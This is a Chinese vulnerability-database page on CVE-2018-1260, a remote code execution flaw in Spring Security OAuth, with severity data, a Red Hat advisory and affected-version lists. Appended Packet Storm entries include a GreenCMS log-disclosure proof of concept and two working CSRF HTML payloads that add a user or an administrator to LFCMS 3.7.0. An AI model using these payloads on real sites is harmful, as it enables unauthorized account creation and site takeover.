CVE-2018-1260
CVSS7.5
发布时间 :2018-05-11 16:29:00
修订时间 :2018-06-14 13:34:49
NMPS    

[原文]Spring Security OAuth, versions 2.3 prior to 2.3.3, 2.2 prior to 2.2.2, 2.1 prior to 2.1.2, 2.0 prior to 2.0.15 and older unsupported versions contains a remote code execution vulnerability. A malicious user or attacker can craft an authorization request to the authorization endpoint that can lead to remote code execution when the resource owner is forwarded to the approval endpoint.


[CNNVD]CNNVD数据暂缺。


[机译]译文暂缺.

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-94 [对生成代码的控制不恰当(代码注入)]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1260
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1260
(官方数据源) NVD

- 其它链接及资源

http://www.securityfocus.com/bid/104158
(VENDOR_ADVISORY)  BID  104158
https://access.redhat.com/errata/RHSA-2018:1809
(VENDOR_ADVISORY)  REDHAT  RHSA-2018:1809
https://pivotal.io/security/cve-2018-1260
(VENDOR_ADVISORY)  CONFIRM  https://pivotal.io/security/cve-2018-1260

- 漏洞信息 (F148079)

Red Hat Security Advisory 2018-1809-01 (PacketStormID:F148079)
2018-06-07 00:00:00
Red Hat  
advisory,denial of service,vulnerability,code execution
linux,redhat
CVE-2018-1257,CVE-2018-1259,CVE-2018-1260
[点击下载]

Red Hat Security Advisory 2018-1809-01 - Red Hat Openshift Application Runtimes provides an application platform that reduces the complexity of developing and operating applications for OpenShift as a containerized platform. This release of RHOAR Spring Boot 1.5.13 serves as a replacement for RHOAR Spring Boot 1.5.12, and includes bug fixes and enhancements. For further information, refer to the Release Notes linked to in the References section. Issues addressed include code execution and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenShift Application Runtimes Spring Boot security and bug fix update
Advisory ID:       RHSA-2018:1809-01
Product:           Red Hat OpenShift Application Runtimes
Advisory URL:      https://access.redhat.com/errata/RHSA-2018:1809
Issue date:        2018-06-07
CVE Names:         CVE-2018-1257 CVE-2018-1259 CVE-2018-1260 
=====================================================================

1. Summary:

An update is now available for Red Hat OpenShift Application Runtimes.

Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.

2. Description:

Red Hat Openshift Application Runtimes provides an application platform
that reduces the complexity of developing and operating applications
(monoliths and microservices) for OpenShift as a containerized platform.

This release of RHOAR Spring Boot 1.5.13 serves as a replacement for RHOAR
Spring Boot 1.5.12, and includes bug fixes and enhancements. For further
information, refer to the Release Notes linked to in the References
section.

Security Fix(es):

* spring-messaging: ReDoS Attack with spring-messaging (CVE-2018-1257)

* spring-data: XXE with Spring Dataas XMLBeam integration (CVE-2018-1259)

* spring-security-oauth2: Remote Code Execution with spring-security-oauth2
(CVE-2018-1260)

For more details about the security issue(s), including the impact, a CVSS
score, and other related information, refer to the CVE page(s) listed in
the References section.

3. Solution:

Before applying the update, back up your existing installation, including
all applications, configuration files, databases and database settings, and
so on.

The References section of this erratum contains a download link (you must
log in to download the update).

4. Bugs fixed (https://bugzilla.redhat.com/):

1578578 - CVE-2018-1257 spring-framework: ReDoS Attack with spring-messaging
1578902 - CVE-2018-1259 spring-data-commons: XXE with Spring Dataas XMLBeam integration
1584376 - CVE-2018-1260 spring-security-oauth: remote code execution in the authorization process

5. References:

https://access.redhat.com/security/cve/CVE-2018-1257
https://access.redhat.com/security/cve/CVE-2018-1259
https://access.redhat.com/security/cve/CVE-2018-1260
https://access.redhat.com/security/updates/classification/#important
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=catRhoar.spring.boot&downloadType=distributions&version=1.5.13
https://access.redhat.com/documentation/en-us/red_hat_openshift_application_runtimes/1/html-single/red_hat_openshift_application_runtimes_release_notes/

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2018 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIVAwUBWxjsW9zjgjWX9erEAQhfEQ/+PTikYmX1OgClszizb9ySdvw81KmHoXPl
g5YBhWPzXTlZgHwC27wrUlB9Z8GqGgKTcYnyrttHQLFzkvUBiD6su8rRswEYzKwo
N1zYYOaWpXAFKSYTxiMEaVyUIDqFicLRRZ0aYM85nqpds0Bbg3Tg9OTCvp5L2XNU
Apmj78FynXibXTBx5UJ/qby6L82GaFyHjThjRQNfpsxz2SY6B3gFyUQmvVmqW7wQ
XGLAIQVvSR5Ot5spBRa1wDutL4mNAYYlBr2zLbP/KJbZhYdQxAccBTT2wD5dyiLo
+TC3mtMfR+OnyaEQx8ujPY4so8YxMMrKs7NZ2nCLDm20YjRCguRWK/i/pYJm0yBf
eu79WyRlRbNVh/GR4FuGAl5zk6p10+dLEBlRALuL8d+aeyywkb7p3UqUSW2/KpEL
k4ZlpzwA2IOuTfk7RNi2TrzJzdQ/HvHHjAs0o+Svq4kOgAEKnxBSBLZmxuVd06l7
jxRwHo/AZ83JSxEczAAB4NavEYCNFKxJCK4o3p2C2oZIVxPkqWiPBo9JGYvkwXdL
9wkc7EE2+ZQA6zxdYEUf43wU9Mc9zTOyr/KupJXcn+osPCQzmj0fKSVAoe492IBX
EblswgDjFLhRR836ocazA4GcyYMUgSGmIb93CfFZytUR2csR1HDlQ7azWklbnUIM
mU0w0GxsQgU=
=FqMM
-----END PGP SIGNATURE-----

--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
    

- 漏洞信息 (F148281)

GreenCMS 2.3.0603 Information Disclosure (PacketStormID:F148281)
2018-06-22 00:00:00
vr_system  
exploit,info disclosure
CVE-2018-12604
[点击下载]

GreenCMS version 2.3.0603 suffers from a sensitive information disclosure vulnerability.

# Exploit Title: GreenCMS 2.3.0603 - remote obtain sensitive information
# Date: 2018-06-21
# Exploit Author: vr_system
# Vendor Homepage: https://github.com/GreenCMS/GreenCMS/
# Software Link: https://github.com/GreenCMS/GreenCMS/
# Version: GreenCMS 2.3.0603
# Tested on: windows 7
# CVE : CVE-2018-12604
 
#  POCAPSAohttp://site.com/Data/Log/year_month_day.log.
# Tested Link: 
http://site.com/GreenCMS-beta/Data/Log/18_06_20.log  
http://site.com/Data/Log/18_06_20.log


    

- 漏洞信息 (F148276)

LFCMS 3.7.0 Cross Site Request Forgery (PacketStormID:F148276)
2018-06-21 00:00:00
bay0net  
exploit,csrf
CVE-2018-12602
[点击下载]

LFCMS version 3.7.0 suffers from an add user cross site request forgery vulnerability.

# Exploit Title: A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily.
# Date: 2018-06-20
# Exploit Author: bay0net
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9203740.html
# Software Link: http://www.lfdycms.com/home/down/index/id/26.html
# Version: 3.7.0
# CVE : CVE-2018-12602
 
 
A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily.
 
 
The payload for attack is as follows.
 
 
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Users/add.html" method="POST">
      <input type="hidden" name="username" value="test222" />
      <input type="hidden" name="email" value="test2@qq.com" />
      <input type="hidden" name="password" value="test222" />
      <input type="hidden" name="repassword" value="test222" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

    

- 漏洞信息 (F148268)

LFCMS 3.7.0 Cross Site Request Forgery (PacketStormID:F148268)
2018-06-21 00:00:00
bay0net  
exploit,csrf
CVE-2018-12603
[点击下载]

LFCMS version 3.7.0 suffers from an add administrator cross site request forgery vulnerability.

# Exploit Title: A CSRF vulnerability exists in LFCMS_3.7.0: administrator account can be added arbitrarily.
# Date: 2018-06-20
# Exploit Author: bay0net
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9203899.html
# Software Link: http://www.lfdycms.com/home/down/index/id/26.html
# Version: 3.7.0
# CVE : CVE-2018-12603
 
 
A CSRF vulnerability exists in LFCMS_3.7.0:  administrator account can be added arbitrarily.
 
 
The payload for attack is as follows.
 
 
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Member/add.html" method="POST">
      <input type="hidden" name="username" value="admin2" />
      <input type="hidden" name="password" value="admin2" />
      <input type="hidden" name="repassword" value="admin2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

    

- 漏洞信息

Pivotal Spring Security OAuth CVE-2018-1260 Remote Code Execution Vulnerability
Input Validation Error 104158
Yes No
2018-05-09 12:00:00 2018-05-09 12:00:00
Philippe Arteau from GoSecure

- 受影响的程序版本

Pivotal Spring Security OAuth 2.3.2
Pivotal Spring Security OAuth 2.2.1
Pivotal Spring Security OAuth 2.1.1
Pivotal Spring Security OAuth 2.0.14
Pivotal Spring Security OAuth 2.0.10
Pivotal Spring Security OAuth 2.0.9
Pivotal Spring Security OAuth 2.0.8
Pivotal Spring Security OAuth 2.0.7
Pivotal Spring Security OAuth 2.0.6
Pivotal Spring Security OAuth 2.0.5
Pivotal Spring Security OAuth 2.0.4
Pivotal Spring Security OAuth 2.0.3
Pivotal Spring Security OAuth 2.0.2
Pivotal Spring Security OAuth 2.0.1
Pivotal Spring Security OAuth 2.0
Pivotal Spring Security OAuth 1.0.5
Pivotal Spring Security OAuth 1.0.4
Pivotal Spring Security OAuth 1.0.3
Pivotal Spring Security OAuth 1.0.1
Pivotal Spring Security OAuth 1.0
Pivotal Spring Security OAuth 2.3
Pivotal Spring Security OAuth 2.2
Pivotal Spring Security OAuth 2.1
,Pivotal Spring Security OAuth 2.3.3
Pivotal Spring Security OAuth 2.2.2
Pivotal Spring Security OAuth 2.1.2
Pivotal Spring Security OAuth 2.0.15

- 不受影响的程序版本

Pivotal Spring Security OAuth 2.3.3
Pivotal Spring Security OAuth 2.2.2
Pivotal Spring Security OAuth 2.1.2
Pivotal Spring Security OAuth 2.0.15

- 漏洞讨论

Pivotal Spring Security OAuth is prone to remote code execution vulnerability.

Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the affected application.

The following versions are vulnerable:

Spring Security OAuth 2.3 through 2.3.2
Spring Security OAuth 2.2 through 2.2.1
Spring Security OAuth 2.1 through 2.1.1
Spring Security OAuth 2.0 through 2.0.14
Older unsupported versions

- 漏洞利用

Currently, we are not aware of any working exploits. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 解决方案

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站